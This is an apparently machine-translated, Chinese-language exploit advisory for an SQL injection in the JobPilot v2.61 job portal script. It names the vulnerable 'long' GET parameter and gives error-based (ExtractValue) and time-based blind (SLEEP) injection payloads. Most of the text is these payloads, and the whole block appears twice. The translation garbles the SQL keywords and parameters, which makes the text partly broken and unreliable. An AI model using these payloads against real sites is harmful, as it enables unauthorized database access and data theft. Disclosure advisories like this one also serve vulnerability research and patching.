#利用标题: JobPilot v2.61 -SQL注入
#日期: 2023-06-17
#利用作者: ahmetümitBayram
#vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822
#演示site: https://jobpilot.templatecookie.com
#在: Kali Linux上测试
#CVE: N/A。
----- POC: SQLI --------
参数:长(get)
type:基于错误的
title: mysql=5.1和基于错误的- 在哪里,有,订购或组
根据条款(extractValue)
PAYLOAD:关键字=1LAT=34.0536909 long=-118.242766long=-118.242766)
和ExtractValue(4894,Concat(0x5c,0x7170766271,(Select
(ELT(4894=4894,1))),0x71786B7171)和
(1440=1440lat=34.0536909Location=洛杉矶,洛杉矶县,加利福尼亚
加利福尼亚州的消防合同县联合
statesCategory=Price_min=Price_max=tag=
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD:关键字=1LAT=34.0536909 long=-118.242766long=-118.242766)
(从(select(sleep(5)))bgbf中选择9988)和
(1913=1913lat=34.0536909Location=洛杉矶,洛杉矶县,加利福尼亚
加利福尼亚州的消防合同县联合
statesCategory=Price_min=Price_max=tag=
#日期: 2023-06-17
#利用作者: ahmetümitBayram
#vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822
#演示site: https://jobpilot.templatecookie.com
#在: Kali Linux上测试
#CVE: N/A。
----- POC: SQLI --------
参数:长(get)
type:基于错误的
title: mysql=5.1和基于错误的- 在哪里,有,订购或组
根据条款(extractValue)
PAYLOAD:关键字=1LAT=34.0536909 long=-118.242766long=-118.242766)
和ExtractValue(4894,Concat(0x5c,0x7170766271,(Select
(ELT(4894=4894,1))),0x71786B7171)和
(1440=1440lat=34.0536909Location=洛杉矶,洛杉矶县,加利福尼亚
加利福尼亚州的消防合同县联合
statesCategory=Price_min=Price_max=tag=
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD:关键字=1LAT=34.0536909 long=-118.242766long=-118.242766)
(从(select(sleep(5)))bgbf中选择9988)和
(1913=1913lat=34.0536909Location=洛杉矶,洛杉矶县,加利福尼亚
加利福尼亚州的消防合同县联合
statesCategory=Price_min=Price_max=tag=